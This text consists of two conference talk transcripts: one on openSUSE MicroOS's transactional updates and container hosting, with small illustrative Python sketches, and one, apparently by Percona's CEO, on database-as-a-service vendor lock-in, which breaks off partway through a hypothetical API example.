And these installations are all going to try to have as little variation between them as possible, and also as minimal a number of services on each of them as possible. Quite often, unfortunately, patching gets ignored — it's sometimes easier to rip and replace these VMs than to actually update them. But where you do see these single-purpose VMs being used, if someone needs to add more services, they don't go into an existing VM and modify it; they typically just add more VMs, or in the cloud add more cloud instances, or potentially more IoT devices. So this concept of single-purpose systems isn't that new. On the flip side, there are operating systems and Linux distributions out there that are focused on maximising and optimising for this way of working, but at the moment people are quite often taking traditional distributions and hand-crafting them, building these single-purpose custom installations, quite often having lots of issues with configuration management and with keeping them patched — and optimising these instances for minimal RAM usage, minimal CPU usage and minimal disk usage is incredibly hard work. And nobody is perfect; especially no sysadmin is perfect, speaking as a former sysadmin. Even the best designed and maintained systems have flaws and will fail. These flaws need to be prevented, or at least, if they can't be totally prevented, mitigated so they don't get in the way of what the system is meant to be doing. In my team this is the philosophy of "anything that's worth doing is worth undoing": no issue just appears out of nowhere, so if you're able to do something on a system, there's always a chance that change might be wrong, and there needs to be some way of undoing every single change you make to a running system. And this is really where MicroOS comes in, as an openSUSE variant that's designed to address this whole collection of issues, requirements and this philosophy of single-purpose systems. It's predictable, in that every single time you're installing MicroOS it's going to behave the same way, and it's only going to be updated in a very predictable, atomic fashion. Once it's deployed, it's not going to change without you actively changing it, and if you do make a change, it'll be done in a predictable and rollbackable way. Updates are reliable, with automatic updates and automatic recovery — automatic rollback of any failed update. And we keep MicroOS as small as it can be to do that one job it needs to do. Generally speaking, this means having a very minimal operating system with some kind of container runtime or containerised framework depending on the use case, and then having all the applications and the other services actually running containerised or sandboxed. From an architecture perspective, MicroOS is just built as a variant of openSUSE Tumbleweed — the main Tumbleweed rolling release, always releasing the latest stuff. Tumbleweed gets built consistently in the openSUSE Open Build Service, so that's part of the reliability story there; it can all be reproducibly built. It also gets tested in openQA, and in the case of MicroOS we link all this together.
So it gets built together with the rest of Tumbleweed, it gets tested together with the rest of Tumbleweed, and any build or test failure in either Tumbleweed or MicroOS actually prevents the release of either distribution. You can really see that they're tied together at the hip. The operating system as released right now is pretty small: a typical MicroOS installation on bare metal is going to be about 619 megabytes, most of that because of the kernel, since we need the kernel there for all the bare metal hardware drivers. If you get rid of that, optimise it away and just have MicroOS images for VMs, you're talking more about 380 megabytes — you'll be using the much more optimised kernel-default-base package, and there aren't any firmware packages in there, of course. So much smaller, much lighter, and we're always looking at ways of optimising and shrinking it down even further than that. As a sysadmin, I used to always think: once I've deployed something, I never want to touch it again. Patching is always going to be dangerous, and I don't really want to risk it if I don't have to. That mantra is still very true, but at the same time we still have to update systems — there are always security issues, there are always functionality updates we need. With openSUSE MicroOS we have a transactional update stack. Any change to the system can only happen through this mechanism, because by default MicroOS is actually set to read-only, and updates done this way are always done reliably, reproducibly and reversibly. The entire process is atomic: it either entirely happens or nothing happens at all — you don't get a partial update of a system, it's everything or nothing. And the way we apply it is done without impacting the running system in any way, manner or form. The file management parts, the patching, all happen in a separate chroot, in a separate Btrfs subvolume; nothing in the current running file system gets touched, and then you flip to the new file system in a single atomic operation. From the file system's perspective, it ends up looking like this: you have a Btrfs subvolume basically containing a root file system as a Btrfs snapshot. This is read-only. You're currently booted into the one called the current root, and there will be the historical previous ones — previous versions of previous MicroOS states. When the system wants to be updated — either the user has triggered it or, more realistically, a systemd service is triggering it as part of an automated process — that current root file system gets cloned using Btrfs's snapshot process. That clone gets turned read-write, so again nothing changes in the running system, but that read-only clone becomes a read-write clone. It then gets updated using your typical zypper up or zypper dup process, and then gets changed back to read-only, so all those changes are encapsulated in one single step. That new snapshot gets marked as the next boot target. So your atomic operation for activating the new file system is a reboot, which also has the convenient side effect that all your processes are shut down — there's no nasty side effect of a running process suddenly finding its binaries swapped out from underneath it, or its databases made incompatible, or something nasty like that.
Then after rebooting, you get that new snapshot as your current root file system. If you don't reboot and just keep on updating, only the last version takes effect, because we don't know whether the intermediate snapshots — the ones taken after the current boot but before the next boot — are actually any good. In transactional-update we now have some capability of continuing a snapshot, so you can make one update and then continue it with a second update. But more realistically, if you're just scripting this as a standard system upgrade, those intermediate snapshots you never booted, never patched further and never tested will simply be discarded: on the next reboot they can get thrown away, because we know they're not any good — or, more accurately, we don't know whether they're any good or not. And then you boot into the latest root file system with the last version. All of this is powered by Btrfs. One of the reasons we went down this route is that it is incredibly space efficient: each of these snapshots only contains the diffs, unlike a USR A/B partition scheme where you've got multiple full copies of everything stacked up. It also means we can cover things like the configuration in /etc, so we're not just rolling the binaries back to the version they used to be, but also rolling the configuration back. There's no new packaging format required — we're not doing anything like rpm-ostree, where everything has to be repackaged into a new format. There are no size limitations for partitions or the operating system. It's really easily enhanceable; we can keep on changing this, and we have, adding new functionality for handling things like /etc better and potentially handling other subvolumes. And it's incredibly reliable, because even if the entire boot configuration gets messed up, the boot configuration is still there in a previous snapshot. All we really need is the smallest modification to GRUB to give you a boot menu of all the previous snapshots, and as long as that patch and that configuration file are working, nothing can prevent the system from being bootable. You don't need a customised initrd, you don't need a customised kernel — it's just a very small change to the bootloader, which keeps the threat surface down for any sort of boot-blocking issues. If anything goes wrong, rolling back is a simple case of throwing away the snapshot that you don't like: you immediately go back to the snapshot that was booted last time, so nothing has changed on disk. This can be done as often as you need; there's no waste and no risk involved in it at all. We actually have a process called health-checker which does this — or can do this — as part of the built-in automation of MicroOS. Checking for errors is part of the boot phase, and if there is an error with that snapshot, it will roll back to the last working one. Health-checker can even look at weird transient issues, where the snapshot used to work but then suddenly started breaking, in which case it will actually try rebooting, just like a sysadmin would, and if that doesn't work, shut itself down and inform the sysadmin, so you know something's gone wrong. One limitation of health-checker is, of course, that you need access to the hard disk. But if the system doesn't have a working disk, it's probably not booting anyway — so it's not really that much of a limitation; it's a question of when a system is worth looking after or trying to recover, and if the disk is broken, there's probably not much of a system left to look after.
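To make the update cycle just described easier to follow, here is a minimal conceptual sketch in Python of the clone → patch → flip-on-reboot → roll-back-on-failure bookkeeping. It is not the real transactional-update implementation — the actual work is done by Btrfs snapshots, zypper, GRUB and health-checker — and the snapshot numbering and package names are purely illustrative.

```python
# Conceptual model of the transactional-update snapshot cycle described above.
# This is NOT the real implementation; it only mimics the bookkeeping so the
# atomic "clone, patch, flip on reboot, roll back on failure" idea is visible.
from dataclasses import dataclass, field
from typing import Dict, List


@dataclass
class Snapshot:
    number: int
    packages: Dict[str, str]     # package name -> version
    read_only: bool = True


@dataclass
class MicroOSHost:
    snapshots: List[Snapshot] = field(default_factory=list)
    booted: int = 0              # snapshot number currently running
    next_boot: int = 0           # snapshot number GRUB will use next

    def transactional_update(self, new_packages: Dict[str, str]) -> int:
        """Clone the booted snapshot, patch the clone, mark it for next boot."""
        current = self.snapshots[self.booted]
        clone = Snapshot(number=len(self.snapshots),
                         packages=dict(current.packages),
                         read_only=False)       # clone is briefly read-write
        clone.packages.update(new_packages)     # stands in for `zypper dup`
        clone.read_only = True                  # changes sealed in one step
        self.snapshots.append(clone)
        self.next_boot = clone.number           # running system untouched
        return clone.number

    def reboot(self, healthy: bool = True) -> None:
        """The reboot is the atomic switch; health-checker may roll back."""
        if healthy:
            self.booted = self.next_boot
        else:
            self.next_boot = self.booted        # discard the bad snapshot


host = MicroOSHost(snapshots=[Snapshot(0, {"kernel": "5.10"})])
host.transactional_update({"kernel": "5.11"})
host.reboot(healthy=True)
print(host.snapshots[host.booted].packages)     # {'kernel': '5.11'}
```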
All of this is deployed using the traditional openSUSE way of doing things: a very secure update mechanism, everything delivered over HTTPS, every package is signed, every repository is signed, so you can't just have an intruder swapping out good new packages with old insecure ones. All of this is verified automatically by the package manager. If there's any issue with that chain of trust, or in fact any dependency issue — like a new package not working with something that's already installed — the system doesn't get updated at all. And even if you do an update and something goes wrong during that update process, be it an issue with a package or just something breaking, the entire snapshot gets immediately deleted. So again: reliable, reproducible, and always moving from one known state to another known state. With MicroOS we are targeting multiple architectures. On Arm AArch64 we've got support for both UEFI firmware and U-Boot with EFI. On x86_64 we support both legacy BIOS and UEFI, including Secure Boot. In terms of memory requirements, we're really only asking for about 512 megabytes plus the workload, and in terms of disk space we can boot from as little as four gigabytes — we normally say about ten is realistic, plus the workload. For the four gigabytes: well, if you do the maths, we've only got a roughly 600 megabyte image for a system that can boot from bare metal, so that four gigabytes is there to give us scope for a bunch of change over time with those snapshots. If you've got a really tiny disk and you really want to squeeze it in, of course you can; you're just going to have to be very strict in managing how many previous snapshots you keep — probably no more than one, which is a perfectly legitimate configuration. So these requirements are more like guidelines, so people can just deploy it and forget about it. When it comes to ways of deploying it, we've got a whole raft of different ways of installing it. There are actual DVD and net install ISOs like traditional openSUSE, with a nice customisable installer — streamlined compared to traditional openSUSE — where you can install it, pick what you want, pick the system role, and tinker and tune it how you want. We have pre-configured images for various VM platforms, various cloud platforms and Raspberry Pis, all ready to use. By default they're configured without a password, but they're configured so they can be easily used with a process called Combustion or Ignition, which I'll talk about in a second. Or we have a Salt-based installer called Yomi, which you can find on GitHub, which basically installs directly using SaltStack. So it's completely serverless: you just have a system boot into a Yomi boot environment and deploy itself entirely from code written in Salt. Ignition you might have heard about previously — it originally came from CoreOS, the pre-Fedora CoreOS, and was designed as a replacement for cloud-init. I'm going to skip over it quickly because personally I don't like it that much. Instead I'm going to talk about Combustion, which is basically there to do pretty much the same thing: configure the system as part of that first boot, especially for those cloud images.
A nice thing with Combustion is that it runs as part of the initrd, but it runs as a basic shell script, so you can do pretty much everything you can write in a shell script. I wrote a blog post about this, which you can find on my website: you can add files easily, you can install packages, you can add users, set up devices, repartition the entire system. Of course, you've got that configuration provided on a USB stick or a VM device, but then it's easy to reproduce across all of your machines: they all get configured exactly the same way on that first boot — simple, done, dusted, and then you never have to worry about it again. Once the system's deployed, how are you going to run your services on it? With MicroOS you could just install a traditional RPM using transactional-update. I wouldn't recommend that for more than one or two RPMs, in that traditional, simple, single-use-case example. But one perfect opportunity is, of course, if your MicroOS system has the single job of running containers, and then we would really recommend using something like Podman, which is an alternative to Docker for standalone container hosts. It doesn't have a daemon, it supports your standard Docker/OCI containers and pods, and it has all the familiar commands — podman pull, podman run — that's pretty much what you need to know about it. In the case of openSUSE, we have a registry. All of these containers are built in OBS, and it's very easy to contribute new containers to our registry if you feel like adding to the ecosystem. They're always rebuilt automatically when any package in the openSUSE family, be it Leap or Tumbleweed, is modified, so you get a fresh container out of it. All these images are signed and notarised, and the base images — things like Tumbleweed and Leap — are just a simple podman pull away. We also have a debugging tool called toolbox, which is really useful even if you're not running MicroOS as a container host. Because you've got a read-only root file system, if you need to debug the system you can't just zypper in your debug tools. The nice thing with toolbox is you can just run toolbox: it downloads a container, runs it as an interactive shell, and then you basically have a small container running on that machine where you can install those debugging tools. The current root file system is mounted in there — it's still read-only, so you can't go modifying stuff untransactionally — but it does mean you can see the system as it's running, interrogate the currently running processes, figure out what's going on, and install what you need. And if you want, that can be persistent between uses, so on any one of your systems you can have the same toolbox over and over again, which is really useful if you have a recurring problem and don't want to initialise your toolbox from zero every time. In my case, I'm using MicroOS pretty much all over my life now. I no longer have any traditional openSUSE servers at all, nothing running openSUSE Leap. My Nextcloud is a MicroOS container host running a couple of Nextcloud containers. My blog is another MicroOS container host running a bunch of Jekyll containers, either as long-running processes for things like nginx, or as cron jobs for Jekyll itself — it downloads the git repository, builds my website and then dumps it onto the system. I've also got a rather nice EmulationStation installation plugged into the back of my TV running retro games.
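For a container-host setup like the blog example above, the day-to-day commands really are just podman pull and podman run; here is a small hedged sketch driving them from Python via subprocess. The image name, container name and port mapping are assumptions for illustration — substitute whichever image you actually want from registry.opensuse.org or elsewhere.

```python
# Hedged sketch: drive Podman from Python to deploy a containerised service
# on a MicroOS container host. Image, name and ports below are illustrative.
import subprocess

IMAGE = "registry.opensuse.org/opensuse/nginx"   # assumption: pick a real image
NAME = "my-blog"


def run(cmd):
    print("+", " ".join(cmd))
    subprocess.run(cmd, check=True)


# Pull the image (the `podman pull` mentioned in the talk).
run(["podman", "pull", IMAGE])

# Start it as a long-running service container, publishing port 80.
run(["podman", "run", "--detach", "--name", NAME,
     "--publish", "8080:80", IMAGE])

# Inspect what is running, the same way you would on the shell.
run(["podman", "ps", "--filter", f"name={NAME}"])
```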
And there are other servers besides — all running on MicroOS, all using containers. I've probably got more examples too, because I don't have a single non-MicroOS server in my life anymore. Right, when I talk about MicroOS, some people get the wrong end of the stick with a few things, so just to clear that up in case you're going down the wrong road: MicroOS is not an operating system to run inside containers; it's an operating system to run containers or other workloads on top of. In the case of openSUSE, we already have perfectly usable and perfectly small container base images. The BusyBox container from openSUSE is nine megabytes — tiny as heck — and perfectly reusable for any project you need. Or the Tumbleweed container, which is only around 90 megabytes, still relatively small, and has everything you need to get the service you want installed into your container, job done, be it with Podman, Docker build, Buildah or Kiwi — whatever you're using to build your containers. Now, alongside openSUSE MicroOS we have a side project called openSUSE Kubic, which is a MicroOS derivative focused specifically on containers, and more specifically on Kubernetes in particular. Like MicroOS, it's built and tested entirely as part of the Tumbleweed release process. But it's really dealing with the issues that you have with Kubernetes — Kubernetes being a framework that's focused on that example of the large cluster we were talking about earlier: hundreds or thousands of machines running hundreds or thousands of containers on very large clusters, spanning lots of VMs, potentially also spanning lots of geographies if you've got a very complicated cluster or an arrangement of multiple clusters. And there are a ton of moving parts. You've got the containers themselves, you've got Kubernetes, you've got the container runtime underneath, and all of this stuff quite often has to be configured in sync with each other. Even though Kubernetes runs its control plane in containers, it's still dependent on the container runtime below that and the kubelet below that. So when you suddenly have a situation where you want to update the control plane, you still have to worry about making sure the base operating system is updated, and actually in the right order, because if you update the wrong thing at the wrong time, you can't then update the control plane. So with Kubic we've taken MicroOS and tuned it with the goal of being the perfect Kubernetes operating system. It's fully integrated with the upstream kubeadm way of deploying clusters, it commonly uses CRI-O as its container runtime, and the whole update mechanism is fully integrated with kured, the Kubernetes Reboot Daemon. So transactional-update can update the nodes, tell kured that this node is ready for a reboot, and then the cluster decides, okay, this node or this family of nodes can be rebooted, the services are moved out of the way, and so on. We also have a tool called kubicctl, which is basically a fancy wrapper around kubeadm, just to streamline a few things if you don't want to do things the pure upstream kubeadm way.
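The coordination described here — transactional-update prepares the new snapshot on every node, kured decides when each node may actually reboot — can be sketched as a toy model. This is only a conceptual illustration of the control flow; the real pieces are transactional-update, kured's lock and drain logic and the Kubernetes API, and all the names below are illustrative.

```python
# Conceptual sketch of the node-update flow described above: each node applies
# a transactional update and flags that it needs a reboot; a cluster-level
# coordinator (the role kured plays) then reboots flagged nodes one at a time,
# draining workloads first. The real work is done by transactional-update,
# kured and Kubernetes -- this only models the ordering.

class Node:
    def __init__(self, name):
        self.name = name
        self.reboot_needed = False
        self.cordoned = False

    def transactional_update(self):
        # stands in for `transactional-update dup` writing a reboot sentinel
        self.reboot_needed = True

    def drain(self):
        self.cordoned = True       # workloads get rescheduled elsewhere

    def reboot(self):
        self.reboot_needed = False
        self.cordoned = False      # node comes back with the new snapshot active


def rolling_reboot(nodes):
    """Reboot nodes that need it, strictly one at a time, like kured's lock."""
    for node in nodes:
        if node.reboot_needed:
            node.drain()
            node.reboot()
            assert not any(n.cordoned for n in nodes)  # never two down at once


cluster = [Node(f"worker-{i}") for i in range(3)]
for n in cluster:
    n.transactional_update()
rolling_reboot(cluster)
print([n.reboot_needed for n in cluster])   # [False, False, False]
```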
Something I've been thinking about lately, especially after the acquisition of Rancher by SUSE, is: is Kubic, as we see it right now, actually the perfect Kubernetes operating system? I mean, it's certified by the CNCF and it's a perfectly good example — but could we go even better? And I ask myself this question: if Kubernetes has its containerised control plane, and Kubernetes knows when it needs to update that, and Kubernetes knows what the patch level of the nodes is, why can't we create a version of MicroOS which basically becomes a slave to the Kubernetes cluster entirely? So it would be designed in a way where, instead of having transactional-update patching the node itself — probably even moving the entire transactional-update stack as we know it now out of the MicroOS image, and not having any package management native on the system at all — you do the entire thing as Btrfs send and receive from some centrally curated root subvolume image. You tell the cluster nodes: okay, this is my golden image, this is the image I want to have on my nodes, and then you use the Btrfs send and receive features to just update all of the nodes with a perfect Btrfs clone of that subvolume. Potentially you could even distribute that clone via containers, and then actually have the containers carry out what is effectively the equivalent of the transactional-update process I've already talked about. So you'd still have subvolumes, you'd still have snapshots, you'd still have the ability to roll everything back, but you wouldn't have any binaries on the machine doing it — you'd just have a container deployed that unpacks itself, in essence. And potentially, with Btrfs and its rather nice, complicated B-tree arrangement, you could find a way — and I've got a proof of concept that kind of works — of using Btrfs checksums to verify the entire node root file system. So once one of these upgrades has happened, every node could be checked to make sure they've all got exactly the same version of exactly the same everything, with not a single binary or piece of metadata differing across the entire root file system. None of this is certain or solid yet — this is brainstorming — but if you have any thoughts or ideas on this, please reach out to me, because I think it's a really interesting take on the whole MicroOS thing, and I can see it really taking Kubic in its own direction if it works the way it does in my head, at least.
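To illustrate the verification idea just mentioned — after an image-based update, every node should be bit-for-bit identical — here is a hedged sketch that builds one aggregate digest per root tree and compares the digests across nodes. The real proof of concept leans on Btrfs's own internal checksums rather than re-hashing files, and the example paths and node names here are assumptions.

```python
# Hedged sketch of the "every node must be identical" check described above.
# It builds one aggregate digest over a root tree; comparing the digest from
# each node tells you whether any file content or path differs.
import hashlib
import os


def tree_digest(root: str) -> str:
    h = hashlib.sha256()
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()                          # deterministic walk order
        for name in sorted(filenames):
            path = os.path.join(dirpath, name)
            h.update(os.path.relpath(path, root).encode())
            try:
                with open(path, "rb") as f:
                    for chunk in iter(lambda: f.read(1 << 20), b""):
                        h.update(chunk)
            except OSError:
                h.update(b"<unreadable>")
    return h.hexdigest()


# Example: digests gathered per node (local paths stand in for real nodes).
node_roots = {"worker-1": "/srv/node1-root", "worker-2": "/srv/node2-root"}
digests = {node: tree_digest(path) for node, path in node_roots.items()
           if os.path.isdir(path)}
if len(set(digests.values())) > 1:
    print("Nodes have diverged:", digests)
else:
    print("All checked nodes report the same root image.")
```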
Another side project of regular MicroOS is the MicroOS Desktop, where the team asked itself: what if that one job for MicroOS isn't running containers or some IoT service, but instead is running a desktop — like the Chrome OS example I talked about earlier? We have working MicroOS Desktop images now, where we basically have a small, tiny base system, then just the desktop environment — in this case both KDE and GNOME — and the absolute minimum of configuration tools: a terminal, a package manager, et cetera. And then everything else — the browsers, the applications, all the user-space stuff — is provided by Flatpaks from Flathub, which seems to be a really perfect fit for this. Upstreams are packaging all of that stuff there; why, as a distribution, do we have to package everything again if it's already there, curated nicely, nicely sandboxed and easy for us to bolt onto in our own way? The MicroOS Desktop isn't for everybody. If you already like Tumbleweed and Leap, don't worry, they're safe. I still use Tumbleweed myself, although I can see myself moving away from it in time, because I am a lazy developer, and I think this model is actually perfectly suited for those lazy developers who don't want to tinker with their machine anymore — they just want the desktop to just work. And especially if they mostly develop around containers, like I do more and more, I don't really need to mess around with the operating system; even when I want to get down and dirty with what I'm working on, I can just throw that in a container. So I might as well have a read-only root file system and, in essence, a read-only desktop, and just have the applications provided by containers of some kind. Beyond the lazy developer use case, it should also appeal, like I talked about, to your typical Chromebook, iOS or Android user, who is used to an operating system that is very, very static, that has automated updates and automatic rollbacks, and where the thing they care about is the apps in the app store — and we've got tools for handling apps like an app store now. So I can see things coming down that road rather nicely. The goal of the MicroOS Desktop is a little bit different from the rest of MicroOS. It's still going to be reliable, predictable and immutable, just like MicroOS. It's definitely going to be less customisable than your traditional Tumbleweed or Leap installation — even for contributors. We really welcome contributors to this project, don't get me wrong, but there are times when some new contributor swoops in and says, oh, add this and this and this to the MicroOS Desktop, and I'm like: do we really need any of that stuff? We don't necessarily need to have all the bells and whistles; Tumbleweed and Leap take care of that. We want a less customisable and more curated experience for those users. And as part of that, it should be small — but not necessarily small at the cost of functionality. Things like printing, gaming and media production all need to be there and work, and they quite often have drivers or subsystems, things like CUPS, that need to be installed. So we're not going to say no just for the sake of saying no to keep it small, but at the same time we only want to add something if it helps solve the problem the MicroOS Desktop is trying to solve. And the whole experience should work really nicely out of the box. Judging the MicroOS Desktop as it stands today: we've got those images, they're reliable, they're predictable, they're immutable just like the rest of MicroOS. It's definitely less customisable than regular Tumbleweed and Leap. It's small — and that almost should be a tick box, actually, but it's sometimes a little bit too small at the moment. There is some functionality, for things like gaming drivers or multimedia, that isn't quite as smooth out of the box as I'd like, and generally speaking the MicroOS Desktop isn't as smooth out of the box as we would like it to be. We really would like more people to help us look at it, figure out the packages and the like that are missing — we've trimmed it so tight that it's sometimes a little bit too small now — and just help us get that configuration done so things just work right out of the box. One example of that is when packages are missing: where would the best place be to actually pull the fix from?
If we have it packaged in openSUSE, our tendency has typically been: okay, we'll just pull it from the usual Tumbleweed repository and we're done. But we're starting to get to the point now where Flathub has some of this functionality, some of these packages, already packaged up, and we quite like the idea of the MicroOS Desktop pulling Flatpaks by default. I have to be honest, though — which is why I'm mentioning it here — I don't actually know yet how best to install those Flatpaks by default. So if anybody has any ideas or suggestions, please reach out to me and let me know, because I think that will be the last bit to really get the MicroOS Desktop out of alpha and into beta and regular usage for everybody. If you'd like to reach out or contribute: the MicroOS project originally spawned as a sub-project out of Kubic — it's kind of funny, now Kubic is the sub-project — but the best mailing list to find us all on is the openSUSE Kubic mailing list, or #kubic on IRC on Freenode. Or if you just want to submit something, you can basically send anything to Factory and we'll probably find it at some point; and if you don't already have a devel project in the openSUSE process, then the Kubic devel project on the openSUSE Build Service is where we will take your package and help curate it before we get it into the main distributions. And with that, I am done, so if there are any questions, please fire away and I'll do my best to answer them. Thank you very much.
|
An overview and discussion regarding the openSUSE Project's latest rolling-release distribution, MicroOS. The session will detail how concerns regarding the stability of rolling releases are addressed by narrowing the scope of OS, and using technologies like (Atomic) Transactional Updates and automated health checking to guarantee the system keeps working. The session will cover how MicroOS is developed, and the broad range of suitable use cases, from Container server workloads, to Raspberry Pi's and Desktops including real-world examples from the community.
|
10.5446/53623 (DOI)
|
Hey everyone, today we'll talk about database as a service and how it is ripe for open source and disruption. But before we get to that, I wanted to talk about why I am speaking about database as a service in the distributions devroom to begin with. When I think about distributions, I think these are what we do with a complex system which contains multiple components that must work well together, and in this way provide a lot more value than each of those components separately. Think about Linux distributions, for example, where you could potentially take a kernel, glibc and a bunch of utilities, compile it all together and use it, but that was not really very convenient or practical, so most people were using distributions to begin with. As time went on, we also got distributions for things like OpenStack or, more recently, for Kubernetes. In the database space, "distribution" is not as common a name. But if you think about what MySQL Enterprise or MariaDB Enterprise is, it is really a distribution: it includes the core components, such as the database server, as well as a bunch of tools and utilities to help you with high availability, security, monitoring and other tasks you need to really run a database successfully. On the Percona side, we also have a bunch of database distributions which we actually call distributions. We have distributions for MySQL, for MongoDB and for PostgreSQL at this point. By the way, all of our distributions, unlike MariaDB's and MySQL's, are 100% open source — we don't have any proprietary components. The exception is MongoDB, of course: the server has to be provided under the SSPL license, which is not quite open source, but we don't have a choice in this matter. If you think about database as a service, what really is it? I think it takes this same core concept of a distribution — components which are well tested, integrated and work together — and makes it available in a modern way, through an API. So you're not installing packages; you just make a call and you have a database cluster available for you, you make another call and it's upgraded to a new version, and so on. When it comes to databases, I believe database as a service has won, because it really offers an unparalleled experience of using a database, but at the same time it currently comes with software vendor lock-in, and as we all know, software vendor lock-in sucks. And what happens in such cases, of course, is that open source comes to the rescue. But before I talk more about those topics, let me take you back a little bit to the early days of modern open source. Myself, I got involved in open source in the late 90s, which is now a long time ago. What you had to do at that time was download the sources, then make sure they worked appropriately in your particular environment, maybe apply some patches for that, and so on and so forth. And from that point on, we had a process of simplification: tar.gz archives, binaries, packages, repositories, Docker and Snap packages. What you can see here is this never-ending move towards simplicity. Database as a service is obviously the state of the art of simplicity when it comes to databases, open source or not. So we have a trend where things are becoming easier and easier; the barrier to entry is reduced. And that is actually pretty cool, right?
Because if you think about the modern open source, many developers, which are doing a lot of contribution to open source database, open source ecosystem, database or not, they wouldn't be able to build from scratch all the tools they use. Right? I think majority just use prepared, compiled tools for what they need and just focus on the problems, what they solve. And I think that really allows us to use and produce more complicated, more valuable software. And much more developers can be open source developers, right? You don't have to be the expert in C and bash as in early open source days. You can be just doing open source development in JavaScript or Python. Now with that though, comes a bit of a dark side. If you look at the next round of simplification after all those kind of simple packages, comes with vendor lock-in, which happens in the cloud. Now here is an interesting picture I dig out, which is from explain the cloud at the times when the cloud was not really well understood. And guess what? The cloud computing was compared to electricity. And it kind of makes sense, right? It's not reasonable for you to think now about having your own generator, right? Because you live in some very special circumstances, right? You can get electricity from there a bunch of providers, right? Some of them may be cheaper, are more reliable, yet others may be more green. But at the same time, it is all very much replaceable. It is commodity. But reality though, in the cloud is once cloud was understood, cloud vendors do not want to be commodity. They want to ensure they are not a commodity and typically would advise you to use most proprietary solution, which causes the lock-in. So if you look at the cloud, so what they recommend in the database space, which I am focusing on, you would hear a lot of them advertising things like DynamoDB, Amazon, Aurora, Google Cloud SQL, Spanner, BigQuery, stuff like that. And they wouldn't tell you, hey, guys, you know what? You can actually can run, do it yourself, open source and be successful this way. Now with all that marketing coming in, which is a lot and which can be deafening, I think you should remember what in the end in choice is yours and you can choose your clouds to what extent you want to choose the part of the server and get a lot of lock-in or part of freedom by basing your solution on a commodity cloud APIs and open source software. Going back to the database as a service. Well, currently the easiest and the fastest way to deploy open source and compatible software in the cloud, including databases, is through a proprietary API. And this is not unexpected. If you look at the open source path in the previous generations, it usually takes a lot longer to acquire usability comparable to the open source software. If you look at the late 90s, for example, it was by far easier to install something like Windows NT compared to Linux for server distribution. But open source caught up and in many cases took over the proprietary software in the convenience and usability. Anyway, going back to the databases, you have basically two choices, rolling out your own solution using commodity building blocks or use databases as a service functionality. And the database as a service really provides a lot of value. It does remove a lot of toil like managing availability, database patch in backups can include some automated performance tuning. It's maybe easy to scale, either doing that automatically or kind of as a push button away or API call. 
And really it gives a lot of power to developers. You do not need to have a DBA's help to permission to deploy the database or manage that. You can really choose a number of databases you want and the database which is best focused on the problem at hand. That is one of the reasons we have a huge number of special purpose databases blowing up those days because developers can just choose what they need and run it in the cloud. But at the same time, you need to understand what even if a lot of those solutions in the database space are branded as open source compatible, that is typically what I would call limited hotel California comparability. Meaning is they're designed for you to be very easy to check in to get on board of this platform, but have a hard time to leave this platform if you choose to by providing those nice value added features, which you know only or even sometimes I know only we start to lie in your application and then it would be hard to leave. So a little bit for pro advice out there, if you are choosing to use database as a server and want to make sure you can move back to the open source software of this open source compatible version, make sure your application is remains to be tested with an open source version, both from terms of functionality and in terms of performance. Otherwise, it's maybe very hard to get back that comparability once you once you lost it. And then a challenge of database as a service is what cloud vendors often like to market database as a servers as fully managed. And we have seen a lot of folks being surprised in the end what's well that fully managed that still means there is a lot of shared responsibility. Security, well, you better not do stupid mistakes or cloud vendors would not be able to protect your data or performance or ability, right? A lot of those things are really managed to a limited extent and you often still need the professionals to get that fully managed experience. And what we also have seen in a lot of cases that company when they get in in that fully managed context and they do not have a database professionals on the team can have a bad out house, right? You have probably seen over the last couple of years, there's so many information about the database leaks, data leak from there from here. And in a lot of cases, these are based on the preventable problems. It is just what the team did not have which really understand everything that goes in database security. Here is some of some of the interest and stats in this case, right? Is what you can see what there is increasing number of companies running database as a service, right? We also find, you know, few of them find that hosting being more expensive than they thought. And it is interesting what the performance is used even in that kind of fully managed environment is still considered the most significant problem for them. Another interesting thing in this case as cloud vendors are successful in getting us to use database as a service, we can see what the premium of that database as a service is really growing compared to comparable issues to environment. And that means with just a few database servers, you may be, well, talking about quite a bit of a difference, right? If you only could find to avoid those costs. So with database as a service, locking, I think while it's kind of painful now and those numbers may be not too large, especially if you just need a couple of instances, right? And you are just starting up, it is going to be more painful in the future. 
And here we can go to a history lesson as an example. This young gentleman right here is none other than Larry Ellison. In its early days, Oracle was actually the company which was saving people from IBM's clutches — IBM having the hardware lock-in with its mainframe computers. And guess what? Once Oracle had saved everyone, they kind of turned around and introduced lock-in of their own, with often unfortunate experiences for their customers. So the question we come to is: wouldn't it be great to get database-as-a-service simplicity, but as an open source solution? And I have some bad news for you: we are not quite there yet. But as the title of my talk says, I believe we are ripe right now for disruption. The good news is that we now have Kubernetes, which is pretty mainstream, and it really acts as an operating system for a cluster rather than for individual hosts. It has a lot of momentum, and what is fantastic about it is that it is supported universally in public, private and also hybrid clouds. So if you are building your solution on Kubernetes, it can really run anywhere. Well, you can ask me: Peter, you are the CEO of a company called Percona — what are you folks doing about that, besides telling us that there is a problem to be solved? What we do is build software for this modern world and keep it open source. We have built the Percona Kubernetes Operators for MySQL and MongoDB, and our Percona Monitoring and Management framework, which is also a state-of-the-art, completely open source solution for database monitoring, with management functions coming in. Now we have operators, but operators are often not enough. Operators can be wonderful, and ours are used by a lot of people who are experts in Kubernetes. But if you're just a developer, it is not as simple as starting Amazon RDS in a couple of clicks. What I believe is needed in this case is a database-as-a-service experience which is similar to what Amazon RDS provides, but as open source software and with no vendor lock-in. Now, again, we do not have the full solution for that yet, but we are working on it. We have an experimental CLI, for example, which allows you, after you set up a connection to Kubernetes, to provision databases with pretty much a single command-line call. And we just released, very recently, the database-as-a-service preview in PMM, where you can get exactly that experience — similar to what you get with Amazon and other cloud vendors — and it is also available through API calls if you would prefer that.
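Since the talk doesn't show the CLI or API itself, here is a purely hypothetical sketch of what "a database cluster is one API call away" could look like from Python. The endpoint path, payload fields, token handling and server URL are all invented for illustration; the real PMM DBaaS and Percona operator APIs differ, so consult their documentation before using anything like this.

```python
# Hypothetical sketch of "a database cluster is one API call away".
# Endpoint path, payload fields and token handling are invented for
# illustration only -- check the actual PMM DBaaS / operator docs.
import json
import urllib.request

PMM_URL = "https://pmm.example.com"          # assumption: your PMM server
API_TOKEN = "changeme"                       # assumption: an API token


def provision_cluster(name: str, engine: str, nodes: int) -> dict:
    payload = json.dumps({
        "name": name,
        "engine": engine,                    # e.g. "mysql" or "mongodb"
        "nodes": nodes,
    }).encode()
    req = urllib.request.Request(
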